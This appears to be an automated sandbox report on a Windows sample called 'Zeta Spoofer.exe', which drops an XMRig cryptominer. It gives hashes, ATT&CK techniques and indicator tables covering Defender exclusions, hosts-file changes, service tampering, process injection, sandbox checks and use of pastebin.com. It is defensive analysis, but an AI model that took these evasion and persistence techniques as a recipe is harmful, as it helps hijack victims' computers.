xmrig | 57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9

Resubmissions

27-01-2025 20:41

250127-zghmnsvqbr 10

27-01-2025 20:36

250127-zdqh4svkct 10

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-01-2025 20:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Zeta Spoofer.exe
Size

16.6MB
MD5

58c13144b662425b9373d0687fd6c291
SHA1

0664e627b6539d3ad79cb43d8e3131d5f3bb5b6a
SHA256

57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9
SHA512

c2534c081a34c2f825c59a926c95cdf00c1b23da2290581380c6ad1aa25523cba8e2346c0e54c2b56a7725eda862a2531828ed80edc93e37db9044c41039c960
SSDEEP

393216:5SDLxiW3R0mP1RmUh/ObTeJQlIvfcciFRM3P2lWVPNL+9m+O/:5oLRR0u1RmEOu0Ivfb3NNLz+

Score

10^/10

xmrig defense_evasion discovery execution miner persistence pyinstaller upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4332 created 616	4332	powershell.EXE	5
PID 3964 created 616	3964	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/4368-1136-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/4368-1139-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/4368-1142-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/4368-1141-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/4368-1138-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/4368-1135-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/4368-1140-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2324	powershell.exe
4472	powershell.exe
4332	powershell.EXE
3964	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	ZetaSpoofer.exe
File created	C:\Windows\system32\drivers\etc\hosts	Defenderupdates.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Zeta Spoofer.exe

Executes dropped EXE 4 IoCs

pid	Process
4676	Zeta.exe
4496	ZetaSpoofer.exe
2452	Zeta.exe
2896	Defenderupdates.exe

Loads dropped DLL 19 IoCs

pid	Process
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe
2452	Zeta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	pastebin.com
23	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3672	powercfg.exe
1988	powercfg.exe
2732	powercfg.exe
3468	powercfg.exe
2496	powercfg.exe
3064	powercfg.exe
1180	powercfg.exe
4980	powercfg.exe

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	ZetaSpoofer.exe
File opened for modification	C:\Windows\system32\MRT.exe	Defenderupdates.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4496 set thread context of 1628	4496	ZetaSpoofer.exe	104
PID 2896 set thread context of 4716	2896	Defenderupdates.exe	128
PID 2896 set thread context of 4460	2896	Defenderupdates.exe	129
PID 2896 set thread context of 4368	2896	Defenderupdates.exe	131
PID 4332 set thread context of 4884	4332	powershell.EXE	140
PID 3964 set thread context of 1364	3964	powershell.EXE	143

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4368-1136-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1139-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1142-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1141-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1138-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1135-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1134-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1132-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1130-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1133-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1129-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/4368-1140-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4800	sc.exe
1896	sc.exe
1900	sc.exe
5060	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023ca0-7.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 27 Jan 2025 20:38:29 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02vbusezrtvobmad\DeviceId = "<Data><User username=\"02VBUSEZRTVOBMAD\"><HardwareInfo BoundTime=\"1738010250\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qbfqxlevqhmqqd	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02vbusezrtvobmad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02qbfqxlevqhmqqd\Reason = "2147780641"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02vbusezrtvobmad\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001880110D79C4E2"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4496	ZetaSpoofer.exe
2324	powershell.exe
2324	powershell.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
4496	ZetaSpoofer.exe
2896	Defenderupdates.exe
4472	powershell.exe
4472	powershell.exe
4332	powershell.EXE
4332	powershell.EXE
2896	Defenderupdates.exe
2896	Defenderupdates.exe
2896	Defenderupdates.exe
2896	Defenderupdates.exe
2896	Defenderupdates.exe
2896	Defenderupdates.exe
2896	Defenderupdates.exe
2896	Defenderupdates.exe
4332	powershell.EXE
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
3964	powershell.EXE
3964	powershell.EXE
4884	dllhost.exe
4884	dllhost.exe
3964	powershell.EXE
4884	dllhost.exe
4884	dllhost.exe
3964	powershell.EXE
4884	dllhost.exe
4884	dllhost.exe
3964	powershell.EXE
3964	powershell.EXE
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
3964	powershell.EXE
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe
4884	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3428	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeShutdownPrivilege	3064	powercfg.exe
Token: SeCreatePagefilePrivilege	3064	powercfg.exe
Token: SeShutdownPrivilege	4980	powercfg.exe
Token: SeCreatePagefilePrivilege	4980	powercfg.exe
Token: SeShutdownPrivilege	1180	powercfg.exe
Token: SeCreatePagefilePrivilege	1180	powercfg.exe
Token: SeShutdownPrivilege	3672	powercfg.exe
Token: SeCreatePagefilePrivilege	3672	powercfg.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	4332	powershell.EXE
Token: SeLockMemoryPrivilege	4368	dialer.exe
Token: SeShutdownPrivilege	3468	powercfg.exe
Token: SeCreatePagefilePrivilege	3468	powercfg.exe
Token: SeShutdownPrivilege	2732	powercfg.exe
Token: SeCreatePagefilePrivilege	2732	powercfg.exe
Token: SeShutdownPrivilege	1988	powercfg.exe
Token: SeCreatePagefilePrivilege	1988	powercfg.exe
Token: SeShutdownPrivilege	2496	powercfg.exe
Token: SeCreatePagefilePrivilege	2496	powercfg.exe
Token: SeDebugPrivilege	4332	powershell.EXE
Token: SeDebugPrivilege	4884	dllhost.exe
Token: SeDebugPrivilege	3964	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	2308	svchost.exe
Token: SeIncreaseQuotaPrivilege	2308	svchost.exe
Token: SeSecurityPrivilege	2308	svchost.exe
Token: SeTakeOwnershipPrivilege	2308	svchost.exe
Token: SeLoadDriverPrivilege	2308	svchost.exe
Token: SeSystemtimePrivilege	2308	svchost.exe
Token: SeBackupPrivilege	2308	svchost.exe
Token: SeRestorePrivilege	2308	svchost.exe
Token: SeShutdownPrivilege	2308	svchost.exe
Token: SeSystemEnvironmentPrivilege	2308	svchost.exe
Token: SeUndockPrivilege	2308	svchost.exe
Token: SeManageVolumePrivilege	2308	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2308	svchost.exe
Token: SeIncreaseQuotaPrivilege	2308	svchost.exe
Token: SeSecurityPrivilege	2308	svchost.exe
Token: SeTakeOwnershipPrivilege	2308	svchost.exe
Token: SeLoadDriverPrivilege	2308	svchost.exe
Token: SeSystemtimePrivilege	2308	svchost.exe
Token: SeBackupPrivilege	2308	svchost.exe
Token: SeRestorePrivilege	2308	svchost.exe
Token: SeShutdownPrivilege	2308	svchost.exe
Token: SeSystemEnvironmentPrivilege	2308	svchost.exe
Token: SeUndockPrivilege	2308	svchost.exe
Token: SeManageVolumePrivilege	2308	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2308	svchost.exe
Token: SeIncreaseQuotaPrivilege	2308	svchost.exe
Token: SeSecurityPrivilege	2308	svchost.exe
Token: SeTakeOwnershipPrivilege	2308	svchost.exe
Token: SeLoadDriverPrivilege	2308	svchost.exe
Token: SeSystemtimePrivilege	2308	svchost.exe
Token: SeBackupPrivilege	2308	svchost.exe
Token: SeRestorePrivilege	2308	svchost.exe
Token: SeShutdownPrivilege	2308	svchost.exe
Token: SeSystemEnvironmentPrivilege	2308	svchost.exe
Token: SeUndockPrivilege	2308	svchost.exe
Token: SeManageVolumePrivilege	2308	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2308	svchost.exe
Token: SeIncreaseQuotaPrivilege	2308	svchost.exe
Token: SeSecurityPrivilege	2308	svchost.exe
Token: SeTakeOwnershipPrivilege	2308	svchost.exe
Token: SeLoadDriverPrivilege	2308	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
